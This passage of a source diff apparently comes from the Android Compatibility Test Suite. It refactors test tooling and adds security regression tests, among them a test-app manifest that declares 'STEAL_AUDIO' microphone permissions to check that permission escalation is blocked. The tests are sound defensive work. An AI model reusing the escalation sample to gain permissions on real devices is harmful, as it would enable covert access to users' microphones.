<uses-sdk android:minSdkVersion="19" android:targetSdkVersion="24"/>
diff --git a/common/device-side/preconditions/src/com/android/compatibility/common/preconditions/ScreenLockHelper.java b/common/device-side/preconditions/src/com/android/compatibility/common/preconditions/ScreenLockHelper.java
index 385f22f..d2380af 100644
--- a/common/device-side/preconditions/src/com/android/compatibility/common/preconditions/ScreenLockHelper.java
+++ b/common/device-side/preconditions/src/com/android/compatibility/common/preconditions/ScreenLockHelper.java
@@ -18,7 +18,6 @@
import android.app.KeyguardManager;
import android.content.Context;
-import android.os.Build;
/**
* ScreenLockHelper is used to check whether the device is protected by a locked screen.
@@ -30,9 +29,6 @@
* is no way to programmatically distinguish between the two.
*/
public static boolean isDeviceSecure(Context context) {
- if (Build.VERSION.SDK_INT < Build.VERSION_CODES.M) {
- return true; // KeyguardManager.isDeviceSecure() added in M, skip this check
- }
KeyguardManager km = (KeyguardManager) context.getSystemService(Context.KEYGUARD_SERVICE);
return km.isDeviceSecure();
}
diff --git a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/ReportLogCollector.java b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/ReportLogCollector.java
index a1c8a4a..ccb9faf 100644
--- a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/ReportLogCollector.java
+++ b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/ReportLogCollector.java
@@ -17,6 +17,7 @@
package com.android.compatibility.common.tradefed.targetprep;
import com.android.compatibility.common.tradefed.build.CompatibilityBuildHelper;
+import com.android.compatibility.common.tradefed.util.CollectorUtil;
import com.android.tradefed.build.IBuildInfo;
import com.android.tradefed.config.Option;
import com.android.tradefed.device.DeviceNotAvailableException;
@@ -27,18 +28,8 @@
import com.android.tradefed.targetprep.TargetSetupError;
import com.android.tradefed.util.FileUtil;
-import java.io.BufferedReader;
-import java.io.BufferedWriter;
import java.io.File;
import java.io.FileNotFoundException;
-import java.io.FileReader;
-import java.io.FileWriter;
-import java.io.IOException;
-import java.util.ArrayList;
-import java.util.HashMap;
-import java.util.List;
-import java.util.regex.Matcher;
-import java.util.regex.Pattern;
/**
* An {@link ITargetCleaner} that prepares and pulls report logs.
@@ -59,12 +50,12 @@
@Override
public void setUp(ITestDevice device, IBuildInfo buildInfo) throws TargetSetupError,
- BuildError, DeviceNotAvailableException {
+ BuildError, DeviceNotAvailableException {
prepareReportLogContainers(device, buildInfo);
}
private void addBuildInfo(ITestDevice device, IBuildInfo buildInfo, String key, String value)
- throws DeviceNotAvailableException {
+ throws DeviceNotAvailableException {
}
private void prepareReportLogContainers(ITestDevice device, IBuildInfo buildInfo) {
@@ -103,93 +94,12 @@
CLog.e("%s is not a directory", hostReportDir.getAbsolutePath());
return;
}
- pull(device, mSrcDir, hostReportDir, resultDir);
- reformatRepeatedStreams(resultDir);
+ String resultPath = resultDir.getAbsolutePath();
+ CollectorUtil.pullFromDevice(device, mSrcDir, resultPath);
+ CollectorUtil.pullFromHost(hostReportDir, resultDir);
+ CollectorUtil.reformatRepeatedStreams(resultDir);
} catch (Exception exception) {
exception.printStackTrace();
}
}
-
- private void pull(ITestDevice device, String deviceSrc, File hostDir, File destDir) {
- String hostSrc = hostDir.getAbsolutePath();
- String dest = destDir.getAbsolutePath();
- String deviceSideCommand = String.format("adb -s %s pull %s %s", device.getSerialNumber(),
- deviceSrc, dest);
- try {
- if (device.doesFileExist(deviceSrc)) {
- Process deviceProcess = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c",
- deviceSideCommand});
- if (deviceProcess.waitFor() != 0) {
- CLog.e("Failed to run %s", deviceSideCommand);
- }
- }
- FileUtil.recursiveCopy(hostDir, destDir);
- FileUtil.recursiveDelete(hostDir);
- } catch (Exception e) {
- CLog.e("Caught exception during pull.");
- CLog.e(e);
- }
- }
-
- private void reformatRepeatedStreams(File resultDir) throws IOException, FileNotFoundException {
- File[] reportLogs = resultDir.listFiles();
- // Sometimes report logs are in a sub-directory.
- if (reportLogs.length == 1 && reportLogs[0].isDirectory()) {
- reportLogs = reportLogs[0].listFiles();
- }
- for (File reportLog : reportLogs) {
- try (BufferedReader metricsReader = new BufferedReader(new FileReader(reportLog))) {
- // Get metrics as string.
- StringBuilder metricBuilder = new StringBuilder();
- String line;
- while ((line = metricsReader.readLine()) != null) {
- metricBuilder.append(line);
- }
- String metrics = metricBuilder.toString();
- // Create map of stream names and metrics.
- HashMap<String, List<String>> metricsMap = new HashMap<>();
- String pattern = "\\\"([a-z0-9_]*)\\\":(\\{[^{}]*\\})";
- Pattern p = Pattern.compile(pattern);
- Matcher m = p.matcher(metrics);
- while (m.find()) {
- String key = m.group(1);
- String value = m.group(2);
- if (!metricsMap.containsKey(key)) {
- metricsMap.put(key, new ArrayList<String>());
- }
- metricsMap.get(key).add(value);
- }
- // Rewrite metrics as arrays.
- StringBuilder newMetricsBuilder = new StringBuilder();
- newMetricsBuilder.append("{");
- boolean firstLine = true;
- for (String key: metricsMap.keySet()) {
- if (!firstLine) {
- newMetricsBuilder.append(",");
- } else {
- firstLine = false;
- }
- newMetricsBuilder.append("\"").append(key).append("\":[");
- boolean firstValue = true;
- for (String stream : metricsMap.get(key)) {
- if (!firstValue) {
- newMetricsBuilder.append(",");
- }
- else {
- firstValue = false;
- }
- newMetricsBuilder.append(stream);
- }
- newMetricsBuilder.append("]");
- }
- newMetricsBuilder.append("}");
- reportLog.createNewFile();
- try (BufferedWriter metricsWriter = new BufferedWriter(new
- FileWriter(reportLog))) {
- String newMetrics = newMetricsBuilder.toString();
- metricsWriter.write(newMetrics, 0, newMetrics.length());
- }
- }
- }
- }
}
diff --git a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTest.java b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTest.java
index 248b586..025c13f 100644
--- a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTest.java
+++ b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/CompatibilityTest.java
@@ -99,6 +99,7 @@
private static final String SHARD_OPTION = "shards";
public static final String SKIP_DEVICE_INFO_OPTION = "skip-device-info";
public static final String SKIP_PRECONDITIONS_OPTION = "skip-preconditions";
+ public static final String PRIMARY_ABI_RUN = "primary-abi-only";
public static final String DEVICE_TOKEN_OPTION = "device-token";
public static final String LOGCAT_ON_FAILURE_SIZE_OPTION = "logcat-on-failure-size";
private static final String URL = "dynamic-config-url";
@@ -198,6 +199,11 @@
description = "Whether preconditions should be skipped")
private boolean mSkipPreconditions = false;
+ @Option(name = PRIMARY_ABI_RUN,
+ description = "Whether to run tests with only the device primary abi. "
+ + "This override the --abi option.")
+ private boolean mPrimaryAbiRun = false;
+
@Option(name = DEVICE_TOKEN_OPTION,
description = "Holds the devices' tokens, used when scheduling tests that have"
+ "prerequisites such as requiring a SIM card. Format is <serial>:<token>",
@@ -423,7 +429,9 @@
}
// execute pre module execution checker
- runPreModuleCheck(module.getName(), checkers, mDevice, listener);
+ if (checkers != null && !checkers.isEmpty()) {
+ runPreModuleCheck(module.getName(), checkers, mDevice, listener);
+ }
try {
module.run(listener);
} catch (DeviceUnresponsiveException due) {
@@ -453,7 +461,9 @@
TimeUtil.formatElapsedTime(expected),
TimeUtil.formatElapsedTime(duration));
}
- runPostModuleCheck(module.getName(), checkers, mDevice, listener);
+ if (checkers != null && !checkers.isEmpty()) {
+ runPostModuleCheck(module.getName(), checkers, mDevice, listener);
+ }
}
} catch (FileNotFoundException fnfe) {
throw new RuntimeException("Failed to initialize modules", fnfe);
@@ -469,6 +479,15 @@
Set<IAbi> getAbis() throws DeviceNotAvailableException {
Set<IAbi> abis = new HashSet<>();
Set<String> archAbis = AbiUtils.getAbisForArch(SuiteInfo.TARGET_ARCH);
+ if (mPrimaryAbiRun) {
+ if (mAbiName == null) {
+ // Get the primary from the device and make it the --abi to run.
+ mAbiName = mDevice.getProperty("ro.product.cpu.abi").trim();
+ } else {
+ CLog.d("Option --%s supersedes the option --%s, using abi: %s", ABI_OPTION,
+ PRIMARY_ABI_RUN, mAbiName);
+ }
+ }
for (String abi : AbiFormatter.getSupportedAbis(mDevice, "")) {
// Only test against ABIs supported by Compatibility, and if the
// --abi option was given, it must match.
@@ -477,7 +496,7 @@
abis.add(new Abi(abi, AbiUtils.getBitness(abi)));
}
}
- if (abis == null || abis.isEmpty()) {
+ if (abis.isEmpty()) {
if (mAbiName == null) {
throw new IllegalArgumentException("Could not get device's ABIs");
} else {
diff --git a/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/result/MetadataReporterTest.java b/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/result/MetadataReporterTest.java
index 530bd09..dba3128 100644
--- a/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/result/MetadataReporterTest.java
+++ b/common/host-side/tradefed/tests/src/com/android/compatibility/common/tradefed/result/MetadataReporterTest.java
@@ -36,7 +36,6 @@
*/
public class MetadataReporterTest extends TestCase {
- private static final String ROOT_PROPERTY = "TESTS_ROOT";
private static final String MIN_TEST_DURATION = "10";
private static final String BUILD_NUMBER = "2";
private static final String SUITE_PLAN = "cts";
@@ -73,7 +72,7 @@
mBase.mkdirs();
mTests = new File(mBase, TESTCASES);
mTests.mkdirs();
- System.setProperty(ROOT_PROPERTY, mRoot.getAbsolutePath());
+ System.setProperty(CompatibilityBuildHelper.ROOT_DIR, mRoot.getAbsolutePath());
mBuildInfo = new BuildInfo(BUILD_NUMBER, "", "");
mBuildHelper = new CompatibilityBuildHelper(mBuildInfo);
mBuildHelper.init(SUITE_PLAN, DYNAMIC_CONFIG_URL, START_TIME);
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java
index 00acdf5..e500b00 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/AppSecurityTests.java
@@ -25,9 +25,17 @@
import com.android.tradefed.testtype.IAbi;
import com.android.tradefed.testtype.IAbiReceiver;
import com.android.tradefed.testtype.IBuildReceiver;
+import com.android.tradefed.util.RunUtil;
+import java.io.BufferedReader;
+import java.io.EOFException;
import java.io.File;
import java.io.FileNotFoundException;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+import java.util.ArrayList;
+import java.util.List;
/**
* Set of tests that verify various security checks involving multiple apps are
@@ -289,6 +297,26 @@
}
}
+ /**
+ * Tests that an arbitrary file cannot be installed using the 'cmd' command.
+ */
+ public void testAdbInstallFile() throws Exception {
+ final List<String> output = AdbOutputReader.getOutput(5000L, new String[] {
+ "adb",
+ "-s",
+ getDevice().getSerialNumber(),
+ "shell",
+ "cmd",
+ "package",
+ "install",
+ "-S",
+ "1024",
+ "/data/local/tmp/foo.apk",
+ });
+ assertEquals("Line count", 1, output.size());
+ assertEquals("Error text", "Error: APK content must be streamed", output.get(0));
+ }
+
private void runDeviceTests(String packageName) throws DeviceNotAvailableException {
Utils.runDeviceTests(getDevice(), packageName);
}
@@ -297,4 +325,66 @@
throws DeviceNotAvailableException {
Utils.runDeviceTests(getDevice(), packageName, testClassName, testMethodName);
}
+
+ /** Helper class to collect the output from a command. */
+ private static class AdbOutputReader {
+ public static List<String> getOutput(long timeout, String... command) throws Exception {
+ final Process adbProcess = RunUtil.getDefault().runCmdInBackground(command);
+ final InputStream in = adbProcess.getInputStream();
+ final List<String> lines = new ArrayList<>();
+ final Object threadLock = new Object();
+ final Thread t = new Thread(new Runnable() {
+ @Override
+ public void run() {
+ synchronized (threadLock) {
+ readLines(in, lines);
+ threadLock.notify();
+ }
+ }
+ });
+ final long end = System.currentTimeMillis() + timeout;
+ synchronized (threadLock) {
+ t.start();
+ long now = System.currentTimeMillis();
+ while (now < end) {
+ try {
+ threadLock.wait(end - now);
+ } catch (InterruptedException e) {
+ now = System.currentTimeMillis();
+ continue;
+ }
+ break;
+ }
+ }
+ adbProcess.destroy();
+ t.join();
+ return lines;
+ }
+
+ private static void readLines(InputStream in, List<String> lines) {
+ BufferedReader br = null;
+ try {
+ br = new BufferedReader(new InputStreamReader(in));
+ String line;
+ while ((line = readLineIgnoreException(br)) != null) {
+ lines.add(line);
+ }
+ } catch (IOException ignore) {
+ } finally {
+ if (br != null) {
+ try {
+ br.close();
+ } catch (IOException ignore) { }
+ }
+ }
+ }
+
+ private static String readLineIgnoreException(BufferedReader reader) throws IOException {
+ try {
+ return reader.readLine();
+ } catch (EOFException ignore) {
+ return null;
+ }
+ }
+ }
}
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java
index a4686aa..99a7e8f 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/DirectBootHostTest.java
@@ -111,9 +111,6 @@
/**
* If device doesn't have native FBE, verify normal lifecycle.
- * Note: This test will have a false-negative on the emulator because of the
- * tradefed and ddmlib incorrectly special-case handling the emulator which
- * is fixed in http://r.android.com/315302
*/
public void testDirectBootNone() throws Exception {
if (!isSupportedDevice()) {
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java
index c49340e..52dc79b 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java
@@ -224,6 +224,10 @@
// Verify they can't poke at each other
runDeviceTests(MULTIUSER_PKG, MULTIUSER_CLASS, "testUserIsolation", owner);
runDeviceTests(MULTIUSER_PKG, MULTIUSER_CLASS, "testUserIsolation", secondary);
+
+ // Verify they can't access other users' content using media provider
+ runDeviceTests(MULTIUSER_PKG, MULTIUSER_CLASS, "testMediaProviderUserIsolation", owner);
+ runDeviceTests(MULTIUSER_PKG, MULTIUSER_CLASS, "testMediaProviderUserIsolation", secondary);
} finally {
getDevice().uninstallPackage(MULTIUSER_PKG);
removeUsersForTest(users);
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java
index 072a533..050845b 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/PermissionsHostTest.java
@@ -29,12 +29,18 @@
* dynamic granting and behavior of legacy apps.
*/
public class PermissionsHostTest extends DeviceTestCase implements IAbiReceiver, IBuildReceiver {
- private static final String PKG = "com.android.cts.usepermission";
+ private static final String USES_PERMISSION_PKG = "com.android.cts.usepermission";
+ private static final String ESCALATE_PERMISSION_PKG = "com.android.cts.escalate.permission";
private static final String APK_22 = "CtsUsePermissionApp22.apk";
private static final String APK_23 = "CtsUsePermissionApp23.apk";
private static final String APK_24 = "CtsUsePermissionApp24.apk";
+ private static final String APK_DECLARE_NON_RUNTIME_PERMISSIONS =
+ "CtsDeclareNonRuntimePermissions.apk";
+ private static final String APK_ESCLATE_TO_RUNTIME_PERMISSIONS =
+ "CtsEscalateToRuntimePermissions.apk";
+
private IAbi mAbi;
private IBuildInfo mCtsBuild;
@@ -55,14 +61,16 @@
assertNotNull(mAbi);
assertNotNull(mCtsBuild);
- getDevice().uninstallPackage(PKG);
+ getDevice().uninstallPackage(USES_PERMISSION_PKG);
+ getDevice().uninstallPackage(ESCALATE_PERMISSION_PKG);
}
@Override
protected void tearDown() throws Exception {
super.tearDown();
- getDevice().uninstallPackage(PKG);
+ getDevice().uninstallPackage(USES_PERMISSION_PKG);
+ getDevice().uninstallPackage(ESCALATE_PERMISSION_PKG);
}
public void testFail() throws Exception {
@@ -70,7 +78,7 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testFail");
fail("Expected remote failure");
} catch (AssertionError expected) {
@@ -82,7 +90,7 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testKill");
fail("Expected remote failure");
} catch (AssertionError expected) {
@@ -93,7 +101,7 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_22),
false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testCompatDefault");
}
@@ -102,12 +110,12 @@
MigrationHelper.getTestFile(mCtsBuild, APK_22),
false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testCompatRevoked_part1");
fail("App must be killed on a permission revoke");
} catch (AssertionError expected) {
}
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testCompatRevoked_part2");
}
@@ -115,63 +123,63 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_22),
false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testNoRuntimePrompt");
}
public void testDefault23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testDefault");
}
public void testGranted23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testGranted");
}
public void testInteractiveGrant23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testInteractiveGrant");
}
public void testRuntimeGroupGrantSpecificity23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRuntimeGroupGrantSpecificity");
}
public void testRuntimeGroupGrantExpansion23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRuntimeGroupGrantExpansion");
}
public void testCancelledPermissionRequest23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testCancelledPermissionRequest");
}
public void testRequestGrantedPermission23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRequestGrantedPermission");
}
public void testDenialWithPrejudice23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testDenialWithPrejudice");
}
@@ -179,11 +187,11 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRevokeAffectsWholeGroup_part1");
} catch (AssertionError expected) {
}
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRevokeAffectsWholeGroup_part2");
}
@@ -191,51 +199,51 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testGrantPreviouslyRevokedWithPrejudiceShowsPrompt_part1");
fail("App must be killed on a permission revoke");
} catch (Throwable expected) {
}
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testGrantPreviouslyRevokedWithPrejudiceShowsPrompt_part2");
}
public void testRequestNonRuntimePermission23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRequestNonRuntimePermission");
}
public void testRequestNonExistentPermission23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRequestNonExistentPermission");
}
public void testRequestPermissionFromTwoGroups23() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRequestPermissionFromTwoGroups");
}
// public void testOnlyRequestedPermissionsGranted24() throws Exception {
// assertNull(getDevice().installPackage(
// MigrationHelper.getTestFile(mCtsBuild, APK_24), false, false));
-// runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest24",
+// runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest24",
// "testOnlyRequestedPermissionsGranted");
// }
public void testUpgradeKeepsPermissions() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_22), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testAllPermissionsGrantedByDefault");
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), true, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testAllPermissionsGrantedOnUpgrade");
}
@@ -253,12 +261,12 @@
public void testNoResidualPermissionsOnUninstall() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testNoResidualPermissionsOnUninstall_part1");
- assertNull(getDevice().uninstallPackage(PKG));
+ assertNull(getDevice().uninstallPackage(USES_PERMISSION_PKG));
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testNoResidualPermissionsOnUninstall_part2");
}
@@ -266,28 +274,38 @@
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_22), false, false));
try {
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest22",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest22",
"testRevokePropagatedOnUpgradeOldToNewModel_part1");
fail("App must be killed on a permission revoke");
} catch (AssertionError expected) {
}
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), true, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRevokePropagatedOnUpgradeOldToNewModel_part2");
}
public void testRevokePropagatedOnUpgradeNewToNewModel() throws Exception {
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), false, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRevokePropagatedOnUpgradeNewToNewModel_part1");
assertNull(getDevice().installPackage(
MigrationHelper.getTestFile(mCtsBuild, APK_23), true, false));
- runDeviceTests(PKG, "com.android.cts.usepermission.UsePermissionTest23",
+ runDeviceTests(USES_PERMISSION_PKG, "com.android.cts.usepermission.UsePermissionTest23",
"testRevokePropagatedOnUpgradeNewToNewModel_part2");
}
+ public void testNoPermissionEscalation() throws Exception {
+ assertNull(getDevice().installPackage(MigrationHelper.getTestFile(
+ mCtsBuild, APK_DECLARE_NON_RUNTIME_PERMISSIONS), false, false));
+ assertNull(getDevice().installPackage(MigrationHelper.getTestFile(
+ mCtsBuild, APK_ESCLATE_TO_RUNTIME_PERMISSIONS), true, false));
+ runDeviceTests(ESCALATE_PERMISSION_PKG,
+ "com.android.cts.escalatepermission.PermissionEscalationTest",
+ "testCannotEscalateNonRuntimePermissionsToRuntime");
+ }
+
private void runDeviceTests(String packageName, String testClassName, String testMethodName)
throws DeviceNotAvailableException {
Utils.runDeviceTests(getDevice(), packageName, testClassName, testMethodName);
diff --git a/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/Android.mk b/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/Android.mk
new file mode 100644
index 0000000..b98ba68
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/Android.mk
@@ -0,0 +1,29 @@
+#
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+
+LOCAL_MODULE_TAGS := tests
+
+LOCAL_PACKAGE_NAME := CtsDeclareNonRuntimePermissions
+
+LOCAL_COMPATIBILITY_SUITE := cts
+
+LOCAL_DEX_PREOPT := false
+
+include $(BUILD_CTS_SUPPORT_PACKAGE)
diff --git a/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/AndroidManifest.xml b/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/AndroidManifest.xml
new file mode 100644
index 0000000..411a66b
--- /dev/null
+++ b/hostsidetests/appsecurity/test-apps/DeclareNotRuntimePermissions/AndroidManifest.xml
@@ -0,0 +1,33 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="com.android.cts.escalate.permission">
+
+ <permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO1"
+ android:permissionGroup="android.permission-group.MICROPHONE"
+ android:protectionLevel="normal"/>
+
+ <permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO2"
+ android:permissionGroup="android.permission-group.MICROPHONE"
+ android:protectionLevel="signature"/>
+
+ <uses-permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO1"/>
+ <uses-permission android:name="com.android.cts.escalate.permission.STEAL_AUDIO2"/>
+
+ <application android:hasCode="false"/>
+
+</manifest>
